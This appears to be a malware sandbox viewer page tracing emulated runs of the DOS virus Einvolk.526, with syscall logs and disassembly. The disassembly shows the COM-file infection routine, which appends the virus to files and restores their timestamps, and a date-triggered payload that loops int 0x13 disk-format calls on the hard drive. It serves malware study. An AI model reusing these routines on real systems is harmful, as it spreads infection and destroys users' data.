Sample viewer

vx.netlux.org/Virus.DOS.Einvolk.526

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:10:31.568344138Z 71 PC: 12ac3 | Get current directory
2018-12-17T23:10:31.57257167Z 47 PC: 12ac8 | Get disk transfer address
2018-12-17T23:10:31.574275345Z 26 PC: 12ad9 | Set disk transfer address
2018-12-17T23:10:31.575903218Z 78 PC: 12ae7 | Find first file
2018-12-17T23:10:31.583033451Z 67 PC: 12b85 | Get or set file attributes
2018-12-17T23:10:31.60191454Z 61 PC: 12b8c | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:10:31.610391236Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:31.618279405Z 66 PC: 12bb4 | Move file pointer
2018-12-17T23:10:31.620808883Z 44 PC: 12bbf | Get time 0x12bbf: xor dh, dh
0x12bc1: mov cx, 0x20e
0x12bc4: add cx, dx
0x12bc6: mov dx, 0x104
0x12bc9: add dx, si
0x12bcb: mov ah, 0x40
0x12bcd: int 0x21
0x12bcf: call 0x22b47
0x12bd2: jb 0x12beb
0x12bd4: mov ax, 0x4200
0x12bd7: xor dx, dx
0x12bd9: xor cx, cx
0x12bdb: int 0x21
0x12bdd: jb 0x12beb
0x12bdf: mov ah, 0x40
0x12be1: mov dx, 0x2dc
0x12be4: add dx, si
0x12be6: mov cx, 4
0x12be9: int 0x21
0x12beb: mov ax, 0x5701
2018-12-17T23:10:31.623457135Z 64 PC: 12bcf | Write file or device (Write 591 bytes on handle 5)
2018-12-17T23:10:31.63224145Z 66 PC: 12bdd | Move file pointer
2018-12-17T23:10:31.638142982Z 64 PC: 12beb | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:10:31.64634975Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:10:31.648241088Z 62 PC: 12bfc | Close file
2018-12-17T23:10:31.657917412Z 67 PC: 12c0c | Get or set file attributes
2018-12-17T23:10:31.670822809Z 79 PC: 12ae7 | Find next file
2018-12-17T23:10:31.675023651Z 67 PC: 12b85 | Get or set file attributes
2018-12-17T23:10:31.686612012Z 61 PC: 12b8c | Open file (Filename = 'PRINT.COM')
2018-12-17T23:10:31.696669682Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:31.704607574Z 66 PC: 12bb4 | Move file pointer
2018-12-17T23:10:31.70664691Z 44 PC: 12bbf | Get time 0x12bbf: xor dh, dh
0x12bc1: mov cx, 0x20e
0x12bc4: add cx, dx
0x12bc6: mov dx, 0x104
0x12bc9: add dx, si
0x12bcb: mov ah, 0x40
0x12bcd: int 0x21
0x12bcf: call 0x22b47
0x12bd2: jb 0x12beb
0x12bd4: mov ax, 0x4200
0x12bd7: xor dx, dx
0x12bd9: xor cx, cx
0x12bdb: int 0x21
0x12bdd: jb 0x12beb
0x12bdf: mov ah, 0x40
0x12be1: mov dx, 0x2dc
0x12be4: add dx, si
0x12be6: mov cx, 4
0x12be9: int 0x21
0x12beb: mov ax, 0x5701
2018-12-17T23:10:31.71111764Z 64 PC: 12bcf | Write file or device (Write 602 bytes on handle 5)
2018-12-17T23:10:31.721284477Z 66 PC: 12bdd | Move file pointer
2018-12-17T23:10:31.723319194Z 64 PC: 12beb | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:10:31.731748702Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:10:31.733654647Z 62 PC: 12bfc | Close file
2018-12-17T23:10:31.742466844Z 67 PC: 12c0c | Get or set file attributes
2018-12-17T23:10:31.755044395Z 79 PC: 12ae7 | Find next file
2018-12-17T23:10:31.759128428Z 67 PC: 12b85 | Get or set file attributes
2018-12-17T23:10:31.770461708Z 61 PC: 12b8c | Open file (Filename = 'HELLO.COM')
2018-12-17T23:10:31.778602833Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:31.786625635Z 66 PC: 12bb4 | Move file pointer
2018-12-17T23:10:31.788655834Z 44 PC: 12bbf | Get time 0x12bbf: xor dh, dh
0x12bc1: mov cx, 0x20e
0x12bc4: add cx, dx
0x12bc6: mov dx, 0x104
0x12bc9: add dx, si
0x12bcb: mov ah, 0x40
0x12bcd: int 0x21
0x12bcf: call 0x22b47
0x12bd2: jb 0x12beb
0x12bd4: mov ax, 0x4200
0x12bd7: xor dx, dx
0x12bd9: xor cx, cx
0x12bdb: int 0x21
0x12bdd: jb 0x12beb
0x12bdf: mov ah, 0x40
0x12be1: mov dx, 0x2dc
0x12be4: add dx, si
0x12be6: mov cx, 4
0x12be9: int 0x21
0x12beb: mov ax, 0x5701
2018-12-17T23:10:31.792649818Z 64 PC: 12bcf | Write file or device (Write 607 bytes on handle 5)
2018-12-17T23:10:31.801973327Z 66 PC: 12bdd | Move file pointer
2018-12-17T23:10:31.804037921Z 64 PC: 12beb | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:10:31.811429376Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:10:31.813924199Z 62 PC: 12bfc | Close file
2018-12-17T23:10:31.822415262Z 67 PC: 12c0c | Get or set file attributes
2018-12-17T23:10:31.833396469Z 79 PC: 12ae7 | Find next file
2018-12-17T23:10:31.83765942Z 67 PC: 12b85 | Get or set file attributes
2018-12-17T23:10:31.848796119Z 61 PC: 12b8c | Open file (Filename = 'PHANG.COM')
2018-12-17T23:10:31.856285759Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:31.864456991Z 66 PC: 12bb4 | Move file pointer
2018-12-17T23:10:31.866917469Z 44 PC: 12bbf | Get time 0x12bbf: xor dh, dh
0x12bc1: mov cx, 0x20e
0x12bc4: add cx, dx
0x12bc6: mov dx, 0x104
0x12bc9: add dx, si
0x12bcb: mov ah, 0x40
0x12bcd: int 0x21
0x12bcf: call 0x22b47
0x12bd2: jb 0x12beb
0x12bd4: mov ax, 0x4200
0x12bd7: xor dx, dx
0x12bd9: xor cx, cx
0x12bdb: int 0x21
0x12bdd: jb 0x12beb
0x12bdf: mov ah, 0x40
0x12be1: mov dx, 0x2dc
0x12be4: add dx, si
0x12be6: mov cx, 4
0x12be9: int 0x21
0x12beb: mov ax, 0x5701
2018-12-17T23:10:31.869635252Z 64 PC: 12bcf | Write file or device (Write 613 bytes on handle 5)
2018-12-17T23:10:31.879360286Z 66 PC: 12bdd | Move file pointer
2018-12-17T23:10:31.881207892Z 64 PC: 12beb | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:10:31.888350639Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:10:31.890619607Z 62 PC: 12bfc | Close file
2018-12-17T23:10:31.89982794Z 67 PC: 12c0c | Get or set file attributes
2018-12-17T23:10:31.91103405Z 79 PC: 12ae7 | Find next file
2018-12-17T23:10:31.914386597Z 67 PC: 12b85 | Get or set file attributes
2018-12-17T23:10:31.92571035Z 61 PC: 12b8c | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:10:31.93308896Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:31.940243659Z 66 PC: 12bb4 | Move file pointer
2018-12-17T23:10:31.94310396Z 44 PC: 12bbf | Get time 0x12bbf: xor dh, dh
0x12bc1: mov cx, 0x20e
0x12bc4: add cx, dx
0x12bc6: mov dx, 0x104
0x12bc9: add dx, si
0x12bcb: mov ah, 0x40
0x12bcd: int 0x21
0x12bcf: call 0x22b47
0x12bd2: jb 0x12beb
0x12bd4: mov ax, 0x4200
0x12bd7: xor dx, dx
0x12bd9: xor cx, cx
0x12bdb: int 0x21
0x12bdd: jb 0x12beb
0x12bdf: mov ah, 0x40
0x12be1: mov dx, 0x2dc
0x12be4: add dx, si
0x12be6: mov cx, 4
0x12be9: int 0x21
0x12beb: mov ax, 0x5701
2018-12-17T23:10:31.945764314Z 64 PC: 12bcf | Write file or device (Write 618 bytes on handle 5)
2018-12-17T23:10:31.954617669Z 66 PC: 12bdd | Move file pointer
2018-12-17T23:10:31.957392289Z 64 PC: 12beb | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:10:31.965342856Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:10:31.96727505Z 62 PC: 12bfc | Close file
2018-12-17T23:10:31.976788206Z 67 PC: 12c0c | Get or set file attributes
2018-12-17T23:10:31.987872228Z 79 PC: 12ae7 | Find next file
2018-12-17T23:10:31.991011483Z 67 PC: 12b85 | Get or set file attributes
2018-12-17T23:10:32.002202515Z 61 PC: 12b8c | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:10:32.010108107Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:32.017273216Z 66 PC: 12bb4 | Move file pointer
2018-12-17T23:10:32.019345725Z 44 PC: 12bbf | Get time 0x12bbf: xor dh, dh
0x12bc1: mov cx, 0x20e
0x12bc4: add cx, dx
0x12bc6: mov dx, 0x104
0x12bc9: add dx, si
0x12bcb: mov ah, 0x40
0x12bcd: int 0x21
0x12bcf: call 0x22b47
0x12bd2: jb 0x12beb
0x12bd4: mov ax, 0x4200
0x12bd7: xor dx, dx
0x12bd9: xor cx, cx
0x12bdb: int 0x21
0x12bdd: jb 0x12beb
0x12bdf: mov ah, 0x40
0x12be1: mov dx, 0x2dc
0x12be4: add dx, si
0x12be6: mov cx, 4
0x12be9: int 0x21
0x12beb: mov ax, 0x5701
2018-12-17T23:10:32.022276559Z 64 PC: 12bcf | Write file or device (Write 624 bytes on handle 5)
2018-12-17T23:10:32.032392548Z 66 PC: 12bdd | Move file pointer
2018-12-17T23:10:32.034258318Z 64 PC: 12beb | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:10:32.042555757Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:10:32.04450855Z 62 PC: 12bfc | Close file
2018-12-17T23:10:32.05323685Z 67 PC: 12c0c | Get or set file attributes
2018-12-17T23:10:32.064350387Z 79 PC: 12ae7 | Find next file
2018-12-17T23:10:32.067536901Z 67 PC: 12b85 | Get or set file attributes
2018-12-17T23:10:32.078241338Z 61 PC: 12b8c | Open file (Filename = 'PAH.COM')
2018-12-17T23:10:32.086927528Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:32.094666877Z 66 PC: 12bb4 | Move file pointer
2018-12-17T23:10:32.096537205Z 44 PC: 12bbf | Get time 0x12bbf: xor dh, dh
0x12bc1: mov cx, 0x20e
0x12bc4: add cx, dx
0x12bc6: mov dx, 0x104
0x12bc9: add dx, si
0x12bcb: mov ah, 0x40
0x12bcd: int 0x21
0x12bcf: call 0x22b47
0x12bd2: jb 0x12beb
0x12bd4: mov ax, 0x4200
0x12bd7: xor dx, dx
0x12bd9: xor cx, cx
0x12bdb: int 0x21
0x12bdd: jb 0x12beb
0x12bdf: mov ah, 0x40
0x12be1: mov dx, 0x2dc
0x12be4: add dx, si
0x12be6: mov cx, 4
0x12be9: int 0x21
0x12beb: mov ax, 0x5701
2018-12-17T23:10:32.09981958Z 64 PC: 12bcf | Write file or device (Write 535 bytes on handle 5)
2018-12-17T23:10:32.108807909Z 66 PC: 12bdd | Move file pointer
2018-12-17T23:10:32.110687204Z 64 PC: 12beb | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:10:32.118613946Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:10:32.120592568Z 62 PC: 12bfc | Close file
2018-12-17T23:10:32.129581057Z 67 PC: 12c0c | Get or set file attributes
2018-12-17T23:10:32.140549661Z 79 PC: 12ae7 | Find next file
2018-12-17T23:10:32.143852795Z 67 PC: 12b85 | Get or set file attributes
2018-12-17T23:10:32.15456192Z 61 PC: 12b8c | Open file (Filename = 'TEST.COM')
2018-12-17T23:10:32.162989724Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:32.166368661Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:10:32.168064831Z 62 PC: 12bfc | Close file
2018-12-17T23:10:32.17564995Z 67 PC: 12c0c | Get or set file attributes
2018-12-17T23:10:32.187261084Z 79 PC: 12ae7 | Find next file
2018-12-17T23:10:32.190252341Z 59 PC: 12b40 | Change current directory
2018-12-17T23:10:32.194984052Z 78 PC: 12ae7 | Find first file
2018-12-17T23:10:32.202182763Z 67 PC: 12b85 | Get or set file attributes
2018-12-17T23:10:32.213161737Z 61 PC: 12b8c | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:10:32.226523623Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:32.234526107Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:10:32.236855169Z 62 PC: 12bfc | Close file
2018-12-17T23:10:32.245321535Z 67 PC: 12c0c | Get or set file attributes
2018-12-17T23:10:32.257037354Z 79 PC: 12ae7 | Find next file
2018-12-17T23:10:32.260547808Z 67 PC: 12b85 | Get or set file attributes
2018-12-17T23:10:32.273687887Z 61 PC: 12b8c | Open file (Filename = 'PRINT.COM')
2018-12-17T23:10:32.282276304Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:32.290799417Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:10:32.292912662Z 62 PC: 12bfc | Close file
2018-12-17T23:10:32.301000797Z 67 PC: 12c0c | Get or set file attributes
2018-12-17T23:10:32.318357559Z 79 PC: 12ae7 | Find next file
2018-12-17T23:10:32.321880867Z 67 PC: 12b85 | Get or set file attributes
2018-12-17T23:10:32.338525668Z 61 PC: 12b8c | Open file (Filename = 'HELLO.COM')
2018-12-17T23:10:32.347698895Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:32.355460737Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:10:32.357576507Z 62 PC: 12bfc | Close file
2018-12-17T23:10:32.366432486Z 67 PC: 12c0c | Get or set file attributes
2018-12-17T23:10:32.378292066Z 79 PC: 12ae7 | Find next file
2018-12-17T23:10:32.381724403Z 67 PC: 12b85 | Get or set file attributes
2018-12-17T23:10:32.393747571Z 61 PC: 12b8c | Open file (Filename = 'PHANG.COM')
2018-12-17T23:10:32.403300231Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:32.412058687Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:10:32.414203692Z 62 PC: 12bfc | Close file
2018-12-17T23:10:32.425281551Z 67 PC: 12c0c | Get or set file attributes
2018-12-17T23:10:32.436372165Z 79 PC: 12ae7 | Find next file
2018-12-17T23:10:32.439748347Z 67 PC: 12b85 | Get or set file attributes
2018-12-17T23:10:32.451931695Z 61 PC: 12b8c | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:10:32.459936494Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:32.467171434Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:10:32.469923922Z 62 PC: 12bfc | Close file
2018-12-17T23:10:32.478510004Z 67 PC: 12c0c | Get or set file attributes
2018-12-17T23:10:32.489355466Z 79 PC: 12ae7 | Find next file
2018-12-17T23:10:32.493884616Z 67 PC: 12b85 | Get or set file attributes
2018-12-17T23:10:32.505004414Z 61 PC: 12b8c | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:10:32.512467364Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:32.519915425Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:10:32.522951697Z 62 PC: 12bfc | Close file
2018-12-17T23:10:32.535060615Z 67 PC: 12c0c | Get or set file attributes
2018-12-17T23:10:32.557858563Z 79 PC: 12ae7 | Find next file
2018-12-17T23:10:32.565766048Z 67 PC: 12b85 | Get or set file attributes
2018-12-17T23:10:32.596266365Z 61 PC: 12b8c | Open file (Filename = 'PAH.COM')
2018-12-17T23:10:32.605356986Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:32.617804982Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:10:32.619475134Z 62 PC: 12bfc | Close file
2018-12-17T23:10:32.645748489Z 67 PC: 12c0c | Get or set file attributes
2018-12-17T23:10:32.659387015Z 79 PC: 12ae7 | Find next file
2018-12-17T23:10:32.667748735Z 67 PC: 12b85 | Get or set file attributes
2018-12-17T23:10:32.692220952Z 61 PC: 12b8c | Open file (Filename = 'TEST.COM')
2018-12-17T23:10:32.717429053Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:32.725224568Z 87 PC: 12bf8 | Get or set file date and time
2018-12-17T23:10:32.727292237Z 62 PC: 12bfc | Close file
2018-12-17T23:10:32.735992434Z 67 PC: 12c0c | Get or set file attributes
2018-12-17T23:10:32.744232064Z 79 PC: 12ae7 | Find next file
2018-12-17T23:10:32.746865918Z 26 PC: 12af9 | Set disk transfer address
2018-12-17T23:10:32.748884596Z 59 PC: 12b03 | Change current directory
2018-12-17T23:10:32.755310405Z 42 PC: 12b07 | Get date 0x12b07: cmp dh, 0xb
0x12b0a: jne 0x12b2b
0x12b0c: mov ch, 0
0x12b0e: mov ax, 0x50d
0x12b11: mov cl, 1
0x12b13: mov dx, 0x80
0x12b16: int 0x13
0x12b18: inc ch
0x12b1a: cmp ch, 0xd
0x12b1d: loopne 0x12b0e
0x12b1f: call 0x12b64
0x12b22: mov dx, 0x2e0
0x12b25: add dx, si
0x12b27: mov ah, 9
0x12b29: int 0x21
0x12b2b: mov bx, 0x100
0x12b2e: push bx
0x12b2f: ret
0x12b30: cmp byte ptr [si + 0x2d7], 1
0x12b35: je 0x12aec
2018-12-17T23:10:32.758101545Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":11,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16880,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:54:09.121885949Z 71 PC: 12ac3 | Get current directory
2018-12-25T12:54:09.12502937Z 47 PC: 12ac8 | Get disk transfer address
2018-12-25T12:54:09.125949107Z 26 PC: 12ad9 | Set disk transfer address
2018-12-25T12:54:09.126761552Z 78 PC: 12ae7 | Find first file
2018-12-25T12:54:09.132794625Z 67 PC: 12b85 | Get or set file attributes
2018-12-25T12:54:09.153246417Z 61 PC: 12b8c | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:54:09.159666019Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:54:09.166639274Z 66 PC: 12bb4 | Move file pointer
2018-12-25T12:54:09.167976309Z 44 PC: 12bbf | Get time 0x12bbf: xor dh, dh
0x12bc1: mov cx, 0x20e
0x12bc4: add cx, dx
0x12bc6: mov dx, 0x104
0x12bc9: add dx, si
0x12bcb: mov ah, 0x40
0x12bcd: int 0x21
0x12bcf: call 0x22b47
0x12bd2: jb 0x12beb
0x12bd4: mov ax, 0x4200
0x12bd7: xor dx, dx
0x12bd9: xor cx, cx
0x12bdb: int 0x21
0x12bdd: jb 0x12beb
0x12bdf: mov ah, 0x40
0x12be1: mov dx, 0x2dc
0x12be4: add dx, si
0x12be6: mov cx, 4
0x12be9: int 0x21
0x12beb: mov ax, 0x5701
2018-12-25T12:54:09.169942297Z 64 PC: 12bcf | Write file or device (Write 600 bytes on handle 5)
2018-12-25T12:54:09.177671512Z 66 PC: 12bdd | Move file pointer
2018-12-25T12:54:09.179022681Z 64 PC: 12beb | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:54:09.185241455Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:54:09.186618178Z 62 PC: 12bfc | Close file
2018-12-25T12:54:09.194636474Z 67 PC: 12c0c | Get or set file attributes
2018-12-25T12:54:09.205369707Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.207835619Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.217579209Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.224420999Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.230876145Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.232879745Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.2348306Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.242420564Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.244177818Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.250392251Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.252107329Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.260455852Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.27007305Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.272469206Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.282277418Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.288583467Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.294693214Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.296394253Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.298359936Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.305980327Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.307651839Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.31388921Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.315933494Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.323609944Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.333113395Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.335517047Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.345017354Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.351500426Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.357609458Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.359167487Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.361102471Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.368776354Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.370340376Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.376908126Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.37819119Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.385929861Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.392072196Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.393812082Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.403140028Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.409579784Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.415556942Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.416991804Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.418968262Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.426497015Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.428418449Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.435249955Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.436542548Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.444471383Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.454195858Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.456593181Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.466033587Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.472453803Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.478699153Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.480468701Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.48282529Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.491513971Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.492892639Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.499947542Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.501229235Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.509132622Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.519779421Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.522472113Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.536518812Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.543591563Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.549851473Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.551076081Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.554027168Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.561782141Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.562977207Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.570318266Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.571773967Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.579155468Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.589384924Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.591872033Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.601294741Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.608200887Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.610694967Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.61209922Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.621838751Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.634457975Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.637148882Z 59 PC: 12b40 | Change current directory
2018-12-25T12:54:09.642074915Z 78 PC: 12ae7 | Find first file (See above)
2018-12-25T12:54:09.645942438Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.652014652Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.656882637Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.661671229Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.662811139Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.669833941Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.679083797Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.681474225Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.693692529Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.700751321Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.706766775Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.708945589Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.715962748Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.725301769Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.728869911Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.738331771Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.744645806Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.751776721Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.753201999Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.762512684Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.773012396Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.776183936Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.785863552Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.792304573Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.799067367Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.800353938Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.807304622Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.81910072Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.821467722Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.831411219Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.838189966Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.844262754Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.845838848Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.852798986Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.862382378Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.865225136Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.874936747Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.886725976Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.894637254Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.896238465Z 62 PC: 12bfc | Close file (See above)
